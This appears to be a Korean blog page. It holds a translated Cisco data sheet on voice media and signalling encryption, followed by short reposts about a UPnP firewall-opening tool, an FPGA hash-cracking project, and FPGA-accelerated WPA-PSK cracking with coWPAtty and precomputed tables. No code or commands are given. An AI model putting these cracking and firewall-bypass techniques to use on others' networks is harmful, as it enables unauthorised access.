• 디지털 음성 모듈 NM-HDV2, NM-HDV2-1T1/E1, NM-HDV2-2T1/E1, NM-HDV (모든 버전), AIM-VOICE-30, AIM-ATM-VOICE-30
코덱 지원• G.711, G.729A와 G.729


애플리케이션


시스코 멀티서비스 및 통합 서비스 라우터의 미디어 인증 및 암호화와 더불어 Cisco IP폰 및 Cisco Unified CallManager의 미디어 암호화는 WAN 또는 LAN 사이의 IP 커뮤니케이션에 높은 수준의 보안 환경을 제공합니다. 그림 1과 같이 SRTP를 사용하여 지사 A의 음성 게이트웨이 네트워크 모듈에서 이루어지는 음성 통화를 암호화합니다. 이는 사무실 내의 아날로그 전화 간 또는 팩스 기기 간에 안전한 통화를 제공합니다. 이와 유사하게, 지사 A의 TDM(time-division multiplexing) 엔드포인트 또는 아날로그 전화에서부터 본사의 Cisco Unified IP폰에 이르기까지 안전한 통화를 지원합니다. 지사 A의 게이트웨이와 Cisco Unified CallManager 사이의 시그널링은 IPSec을 사용하여 보호되고, 본사의 IP폰과 Cisco Unified CallManager 사이의 시그널링은 TLS를 사용하여 보호됩니다.


그림 1. 미디어 인증 및 암호화


핵심 기능 및 이점



미디어 인증 및 암호화
미디어 암호화는 현재 Cisco Unified IP폰 간의 음성 통화에 엔드투엔드 암호화를 제공합니다. 시스코 라우터에 미디어 암호화를 도입함으로써 IP폰-게이트웨이 및 게이트웨이-게이트웨이 통화를 안전하게 할 수 있는 기능이 추가됩니다. 사용자는 이제 IETF RFC3711 표준 기반 SRTP 를 사용하여 PSTN 게이트웨이로 암호화된 통화를 할 수 있습니다. SRTP는 추가 암호화 헤더를 추가하지 않고 음성 패킷의 페이로드만 암호화 합니다. 이 때문에 SRTP 암호화 음성 패킷은 RTP 음성 패킷과 거의 구별할 수 없어, 추가 개발 또는 패킷 조작 없이도 서비스 품질(QoS) 및 압축 RTP를 지원할 수 있습니다. 또한 SRTP는 AES 암호화 표준에서 지원하는 가장 큰 실제 키 크기를 사용하여 향상된 보안을 제공합니다. 통화별로 암호화 키가 생성되어 보다 높은 수준의 보안을 보장합니다. 또한 미디어 인증은 통화를 암호화하는 장치의 ID를 확인합니다. LAN에서 음성 개인 정보 및 기밀 유지를 통해 내부 위협으로부터 보호하려면, SRTP를 사용한 미디어 암호화가 적합합니다. 또한, 데이터용으로 배치된 VPN 인프라를 사용하여 IP WAN 또는 인터넷 상에서 미디어 암호화를 제공할 수 있습니다.


시그널링 인증 및 암호화


게이트웨이와 Cisco Unified CallManager 사이의 시그널링 인증 및 암호화는 IPSec를 사용하여 보호됩니다. 이는 DTMF(dual tone multifrequency) 번호, 암호, PIN 및 음성 암호화 키와 같은 시그널링 정보를 안전하게 보호해줍니다. Cisco IOS Software에서 사용 가능한 소프트웨어 기반 IPSec 및 AIM-VPN 모듈을 통한 하드웨어 기반 IPSec이 모두 지원됩니다.


암호화된 통화의 확장성


SRTP 미디어 암호화는 라우터 CPU가 아닌 DSP 모듈에서 수행됩니다. 이는 DSP를 장착한 음성 게이트웨이 인터페이스의 개수 또는 플랫폼(통합 서비스 라우터 등)에서 통합된 DSP의 개수가 증가함에 따라 보안 통화를 위해 사용 가능한 DSP 개수가 증가하기 때문에 효율적인 확장성을 보장합니다.


효율적인 지연 최적화 및 채널 용량 영향


정상적인 MGCP 통화 설정의 일부로 키 교환이 이루어지고 추가 메시지가 도입되지 않기 때문에 암호화된 통화에 추가적인 통화 설정 지연이 발생하지 않습니다. SRTP 미디어 암호화는 라우터 CPU 또는 완료된 음성 패킷을 처리하는 별도의 암호화 엔진에서 수행되는 것이 아니라 DSP에서 수행되기 때문에 음성 미디어 지연도 발생하지 않습니다.


G.729 및 G.729a 모드에서 암호화된 통화에 대한 채널 용량 영향이 없으며 G.711 모드에서는 영향이 최소화됩니다.(표2).


표2. DSP별 채널 영향(예: PVDM2)

코덱일반 음성 통화/DSP암호화 음성 통화/DSP
G.711통화 16번통화 10번
G.729a통화 8번통화 8번
G.729통화 6번통화 6번


관리 기능


미디어 인증 및 암호화는 시스코 라우터의 CLI(command-line interface)를 사용하여 손쉽게 구성할 수 있습니다. 또한, Cisco IP 폰의 잠금 아이콘 표시기와 같은 기능은 지원 게이트웨이로 연결된 통화 시 암호화를 시각적으로 확인할 수 있도록 해줍니다. 콜 플로우 내의 장치가 미디어 암호화를 지원하지 않거나 보안이 노출된 경우, 잠금 아이콘이 사라집니다. 암호화된 통화 및 통화 디버깅에 대한 세부 내용을 확인할 수 있는 CLI 명령도 사용할 수 있습니다.


Cisco Unified Survivable Remote Site Telephony 모드에서의 보안


Cisco Unified Survivable Remote Site Telephony는 Cisco Unified CallManager와의 연결이 끊긴 경우 호 처리 리던던시를 제공합니다. Cisco IOS Software Release 12.3(14)T부터 시작하여 Cisco Unified Survivable Remote Site Telephony 모드의 미디어 인증 및 암호화가 지원되므로, WAN 연결 또는 Cisco Unified CallManager가 다운될 경우 원격 지사 내에서 안전한 통화가 가능한 기능을 제공합니다. WAN 연결 또는 Cisco Unified CallManager가 복구되면 Cisco Unified CallManager가 보안된 호처리 기능을 재개합니다. Cisco Unified Survivable Remote Site Telephony 라우터에서부터 IP폰에 이르기까지 시그널링은 TLS를 사용하여 암호화됩니다.


SRTP 및 IPSEC VPNS


SRTP와 IPSec은 상호 보완적인 VPN 기술입니다. 주요 차이점 중 하나는 SRTP는 끝에서 끝까지, 즉 IP폰에서 IP폰까지 암호화를 제공할 수 있는 반면 IPSec VPN은 라우터-라우터 터널 기반 암호화입니다. 또한, SRTP는 음성 패킷만 암호화하는 반면 IPSec VPN 터널은 데이터, 음성 및 비디오(V3PN이라 불림)를 전송할 수 있습니다. 이는 SRTP가 IPSec VPN을 사용하여 추가적인 음성 트래픽 보호를 제공할 수 있음을 의미 합니다.


신뢰할 수 있는 WAN 네트워크를 보유한 대기업 또는 중소기업의 경우, SRTP를 사용하여 이 네트워크 전체에 걸쳐 음성을 엔드투엔드로 암호화할 수 있습니다. 하지만, 대부분의 기업 업무는 인터넷 또는 서비스 제공업체가 관리하는 WAN을 사용하게 됩니다. 따라서 WAN이 보안되지 않았을 수 있기 때문에 VPN 터널을 사용하여 지사 간의 데이터를 안전하게 전송합니다. 데이터용으로 사용되는 IPSec VPN 네트워크를 통해 WAN 상에서 SRTP를 사용하여 음성 보안을 제공할 수 있습니다. 이는 그림 2에 설명되어 있습니다.


그림 2. 보안 RTP 및 V3PN



기능 가용성


표3. 기능 가용성

프로토콜/기능 지원플랫폼 지원(표4의 지원 모듈 포함)릴리스
MGCP 게이트웨이 (MGCP 0.1)• Cisco 2600XM, 2691, 3660, 3725 및3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco VG224 Analog Phone Gateway
• Cisco IOS Software Release 12.3(11)T2 및 Cisco Unified CallManager 4.1
H.323 게이트웨이 및 IPIP 게이트웨이• Cisco 2600XM, 2691, 3725 및3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco VG224 Analog Phone Gateway
• Cisco IAD 2430 Series Integrated Access Device
• IPIP 게이트웨이는 flow-through 및 flow-around 모드에서 모두 지원됩니다.
• Cisco IOS Software Release 12.4(6)T
• Cisco Unified CallManager 5.0과의 상호 운용이 지원되지만 옵션임
G.729• Cisco 2600XM, 2691, 3660, 3725 및3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco IOS Software Release 12.3(14)T 및 Cisco Unified CallManager 4.1

모듈 가용성

표4. 모듈 가용성
모듈지원플랫폼 지원릴리스
NM-HD-1V, NM-HD-2V, NM-HD-2VE • Cisco 2600XM, 2691, 3660, 3725 및3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco IOS Software Release 12.3(11)T2
H.323 게이트웨이 및 IPIP 게이트웨이• Cisco 2600XM, 2691, 3725 및3745 멀티서비스 플랫폼
• isco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco IOS Software Release 12.3(11)T2
PVDM2-8, PVDM2-16, PVDM2-32, PVDM2-48, PVDM2-64*• Cisco 2801, 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco IOS Software Release 12.3(11)T2-2801 이외의 모든 플랫폼
• Cisco IOS Software Release12.3(14)T-2801 플랫폼
EVM-HD• Cisco 2821, 2851, 3825 및 3845 통합 서비스 라우터• Cisco IOS Software Release 12.3(11)T2 및 Cisco Unified CallManager 4.1
NM-HDV (번들 변경 포함)• Cisco 2600XM, 2691, 3725 및 3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco IOS Software Release 12.3(14)T 및 Cisco Unified CallManager 4.1
AIM-VOICE-30, AIM-ATM-VOICE-30, NM-HDA• Cisco 2600XM, 2691, 3725 및 3745 멀티서비스 플랫폼• Cisco IOS Software Release 12.3(6)T


* The PVDM2 패킷/음성 DSP 모듈은 Cisco 2801, 2811, 2821 및 2851 통합 서비스 라우터의 온보드 VICs/VWICs와 함께 사용됩니다. 또한, Cisco 2821, 2851, 3825 및 3845 통합 서비스 라우터에서 지원되는 EVM-HD(High-Density Analog and Digital Extension Module)와 함께 사용됩니다.


참고 : 시스코 멀티서비스 및 통합 서비스 라우터의 음성 게이트웨이 모듈은 미디어 암호화를 지원하는 Cisco Unified IP Phone 7940G, 7960G, 7970G와 상호운용됩니다. Cisco Unified IP Phone 7970G는 Cisco Unified CallManager 4.0 릴리스에서 미디어 암호화를 지원하며 Cisco Unified IP Phone 7960G와 7940G는 Cisco Unified CallManager 4.1 릴리스에서 미디어 암호화를 지원합니다.


CISCO UNIFIED COMMUNICATIONS 서비스 및 지원


Cisco Lifecycle Services 접근 방법을 통하여 시스코 시스템즈와 파트너들은 Cisco Unified Communications 시스템을 지원하기 위한 광범위 한 엔드투엔드 서비스 포트폴리오를 제공합니다. 이러한 서비스들은 IP 커뮤니케이션 서비스 구축, 운영 및 최적화에 입증된 방법론들을 기반으로 구성되었습니다. 예를 들어, 사전 계획 및 설계 서비스는 촉박한 구축 스케줄을 맞출 수 있게 해주며, 구현 중 네트워크 중단을 최소화시켜 줍니다. 운영 서비스는 전문적 기술 지원으로 커뮤니케이션 다운타임 위험을 줄여주며, 최적화 서비스는 솔루션 성능 향상을 통해 업무 효율성을 높여줍니다. 시스코 및 파트너들은 시스템 레벨 서비스 및 지원을 제공하여 업무적 요구사항을 만족시킬 수 있는 탄력적인 컨버지드 네트워크를 구축하고 유지할 수 있습니다.


결론


미디어 인증 및 암호화는IP 커뮤니케이션을 구현하는 대기업 및 중소기업에 추가적인 보안 레이어를 제공합니다. TDM 또는 아날로그 음성 게이트웨이 포트 또는 Cisco Unified IP폰으로 연결되는 음성 대화는 LAN 및 WAN 상의 표준 기반 암호화를 통해 도청으로부터 보호됩니다.


제품 호환성


표5. 제품 호환성

제품 호환성• Cisco 2600XM, 2691, 3725 및3745 멀티서비스 플랫폼
• Cisco 2811, 2821, 2851, 3825 및 3845 통합 서비스 라우터
• Cisco VG224 Analog Phone Gateway
• Cisco IAD 2430 Series Integrated Access Device
• MGCP 및 SCCP용 Cisco Unified CallManager 4.1(Cisco Unified SRST 모드)
• Cisco Unified CallManager 5.0 (H.323)
소프트웨어 호환성• Advanced IP Services Image
• Advanced Enterprise Services Image
프로토콜• MGCP 0.1, H.323, SCCP (SRST 모드)

주문 정보
주문을 하려면 시스코 고객 담당자에게 문의하거나 시스코 웹사이트를 방문하십시오. 주문 정보는 표 6을 참조하십시오.

표 6. 주문 정보
제품명부품번호
IP Communications High Density Digital Voice Network Module
NM-HDV2
IP Communications High Density Digital Voice Network Module with One Built-in T1/E1 Port NM-HDV2-1T1/E1
IP Communications High Density Digital Voice Network Module with Two Built-in T1/E1 Port NM-HDV2-1T1/E1
One-Slot IP Communications Voice/Fax Network ModuleNM-HD-1V
Two-Slot IP Communications Voice/Fax Network ModuleNM-HD-2V
Two-Slot IP Communications Enhanced Voice/Fax Network ModuleNM-HD-2VE
Digital T1/E1 Packet Voice/Fax Network ModuleNM-HDV (모든 번들 변경 포함)
30-channel Voice/Fax DSP Advanced Integration ModuleAIM-VOICE-30, AIM-ATM-VOICE-30
High-Density Analog and Digital Extension ModuleEVM-HD
8-Channel Packet Fax/Voice DSP ModulePVDM2-8
16-Channel Packet Fax/Voice DSP Module PVDM2-16
32-Channel Packet Fax/Voice DSP Module PVDM2-32
48-Channel Packet Fax/Voice DSP Module PVDM2-48
64-Channel Packet Fax/Voice DSP Module PVDM2-64


추가 정보


시스코 미디어 인증 및 암호화 기능에 대한 자세한 정보는 다음 웹사이트를 방문하거나 시스코 고객 담당자에게 문의하십시오.


Cisco IOS MGCP 게이트웨이의 음성 보안 기능


http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123newft/123t/123t_11/gtsecure.htm

안전한 Cisco Unified Survivable Remote Site Telephony:
http://lbj.cisco.com/ucdit/cc/td/doc/product/software/ios123/123newft/123t/123t_106/sr_scur1.htm



Trackbacks 0 : Comments 0

Write a comment


uPnP 이용해 방화벽 열기

ⓒ Network 2007.11.16 12:47

출처 : http://swbae.egloos.com/1667786

uPnP 이용해 방화벽 열기

uPnP 이용해서 게이트웨이의 방화벽 포트를 여는 방법

http://www.hackszine.com/blog/archive/2007/10/upnp_change_a_routers_firewall.html

개념은 이미 수년 전에 소개되었고, P2P 소프트웨어 안에는 uPnP 이용해 방화벽 여는 코드가 포함되어 있어서, 해당 코드를 이용해 방화벽을 몰래 여는 기법이 자주 사용되어 왔지만...

윈도우 환경에서 손쉽게 사용 가능한 전용 툴이 공개된 것은 처음인 것 같네요.

이제 정말 게이트웨이 설정에서 uPnP 기능은 반드시 제거하시는 것이 좋을 듯...

Trackbacks 0 : Comments 0

Write a comment


NSA@Home

ⓒ Network 2007.11.16 12:43

출처 : http://swbae.egloos.com/1667791

NSA@Home

예전에 이걸 적은 기억이 나는데... 블로그에서 검색해보니 안나오네요.

NSA@Home 이라고, FPGA 를 이용한 고속의 MD5, SHA-1 크랙 장비 관련 프로젝트 입니다.

http://nsa.unaligned.org/index.php
Trackbacks 0 : Comments 0

Write a comment


coWPAtty FPGA WPA 크랙

ⓒ Network 2007.11.16 12:41

출처 : http://openciphers.sourceforge.net/oc/wpa.php

coWPAtty FPGA WPA 크랙




SHA-1 Core

This core is a tiny implementation of SHA-1 that is optimized more for size than speed. It requires less than 500 Slices and 4 BlockRAMs and can be clocked up to 120MHz on the Virtex-4 (80 clock cycles are required for valid data). It uses a simple bus interface to write values to it and pull out results. The end goal of this project is to create a full core that is able to accelerate WPA-PSK cracking through hooks into coWPAtty and/or aircrack. The small size should allow us to parallelize multiple instances of the SHA-1 core on an FPGA to multiply the performance.


WPA-PSK PBKDF2 Core

This is the SHA1 core adapted for doing WPA-PSK cracking. It uses BlockRAMs to buffer the SHA1 input and output values to streamline throughput. It's setup to accomodate larger FPGA designs that can use more SHA1 cores to increase performance.


coWPAtty

Currently coWPAtty has full support for cracking WPA-PSK on the Pico E-12 card. This project contains the modifications made to coWPAtty and the proper Pico E-12 bit file to use FPGA acceleration under Linux 2.4 using the pcmcia-cs memory_cs driver. The FPGA acceleration provides roughly a 6x speed improvement over a top of the line Intel/AMD processor as shown below:

Processor
Speed
800MHz P3
~25/sec
3.6GHz+ P4
~60/sec
2.16GHz Intel Duo
~70/sec

FPGA
Speed
Pico E-12 (Virtex-4 LX25)
~430/sec
Pico E-14 (Virtex-4 FX20)
~380/sec
Pico E-14 (Virtex-4 FX60)
~1,000/sec


Precomputed Hashtables

The Shmoo Group has been nice enough to host our WPA tables on their bittorrent tracker located here. If you want to help out, please download and seed the tables to help speed up the download for others.

Trackbacks 0 : Comments 0

Write a comment